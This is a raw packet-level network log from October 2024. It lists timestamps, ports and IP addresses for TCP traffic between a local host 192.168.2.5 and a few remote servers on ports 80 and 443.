                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.037091970 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.037138939 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.037172079 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.038130999 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.038228035 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.038378000 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.038388968 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.038431883 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.051821947 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.062427998 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.062459946 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.062495947 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.062504053 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.062524080 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.062524080 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.062541962 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.062551975 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.062560081 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.062560081 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.062585115 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.062608004 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.067889929 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.067954063 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.067995071 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.068128109 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.083491087 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.083555937 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.083724976 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.083792925 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.144784927 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.144805908 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.144860029 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.144886017 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.144918919 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.144959927 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.154972076 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.155020952 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.155025005 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.155034065 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.155097961 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.155097961 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.155597925 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.155608892 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.155652046 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.156950951 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.157011986 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.157037020 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.157048941 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.157083035 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.183629036 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.183655024 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.183698893 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.183717012 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.183759928 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.183759928 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.183764935 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.183784008 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.183804989 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.183805943 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.183834076 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.183835983 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.183878899 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.186840057 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.186878920 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.186892033 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.186920881 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.186922073 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.186961889 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.196849108 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.196877956 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.196932077 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.196949005 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.196990967 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.197037935 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.243609905 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.243666887 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.243674994 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.243725061 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.270433903 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.270452023 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.270539045 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.270560026 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.270617962 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.271925926 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.271992922 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.272013903 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.272026062 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.272049904 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.272079945 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.272324085 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.272344112 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.272394896 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.272428036 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.272444963 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.272628069 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.272973061 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.273037910 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.273047924 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.273058891 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.273103952 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.273104906 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.273188114 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.273629904 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.302130938 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.302143097 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.302201033 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.302217960 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.302248955 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.302277088 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.302277088 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.302481890 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.304239988 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.304299116 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.304385900 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.304399014 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.304441929 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.305206060 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.305263042 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.336257935 CET4434983513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.336690903 CET49835443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.336711884 CET4434983513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.337167978 CET49835443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.337173939 CET4434983513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.384249926 CET4434983013.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.384283066 CET4434983013.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.384294033 CET4434983013.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.384327888 CET4434983013.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.384361982 CET4434983013.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.384371996 CET49830443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.384371996 CET49830443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.384387016 CET4434983013.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.384411097 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.384432077 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.384474993 CET4434983013.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.384488106 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.384504080 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.384517908 CET49830443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.384517908 CET49830443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.384552002 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.384553909 CET49830443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.388851881 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.388906002 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.388951063 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.388962984 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.388998032 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.389364958 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.389377117 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.389417887 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.390671968 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.390685081 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.390695095 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.390728951 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.390750885 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.392522097 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.392541885 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.392608881 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.392618895 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.392699957 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.420922041 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.420985937 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.421030045 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.421042919 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.421092987 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.421113968 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.421430111 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.421446085 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.421466112 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.421494961 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.421555996 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.421917915 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.421932936 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.421974897 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.422722101 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.422734976 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.422837019 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.461389065 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.461417913 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.461460114 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.461471081 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.461492062 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.461513042 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.471105099 CET4434983513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.471451998 CET4434983513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.471546888 CET49835443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.471584082 CET49835443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.471605062 CET4434983513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.471618891 CET49835443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.471626043 CET4434983513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.476917028 CET49841443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.476941109 CET4434984113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.477020979 CET49841443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.477229118 CET49841443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.477241993 CET4434984113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.485157013 CET4434983613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.485574961 CET49836443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.485615969 CET4434983613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.485996008 CET49836443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.486007929 CET4434983613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.504703045 CET4434983013.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.504728079 CET4434983013.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.504776001 CET49830443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.504792929 CET4434983013.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.504822969 CET49830443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.504961014 CET49830443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.507834911 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.507927895 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.507973909 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.507986069 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.508018017 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.508049965 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.508071899 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.508081913 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.508107901 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.508137941 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.508388996 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.508431911 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.508831978 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.509057045 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.511092901 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.511112928 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.511158943 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.511198044 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.511226892 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.511327982 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.518412113 CET4434983713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.518963099 CET49837443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.519026995 CET4434983713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.519403934 CET49837443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.519418001 CET4434983713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.538052082 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.538129091 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.538141012 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.538156033 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.538199902 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.538199902 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.538425922 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.538436890 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.538448095 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.538486958 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.538486958 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.562283039 CET4434983913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.562719107 CET49839443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.562766075 CET4434983913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.563157082 CET49839443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.563167095 CET4434983913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.579435110 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.579482079 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.579509974 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.579516888 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.579564095 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.633799076 CET49842443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.633852005 CET443498424.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.633917093 CET49842443192.168.2.54.152.133.8
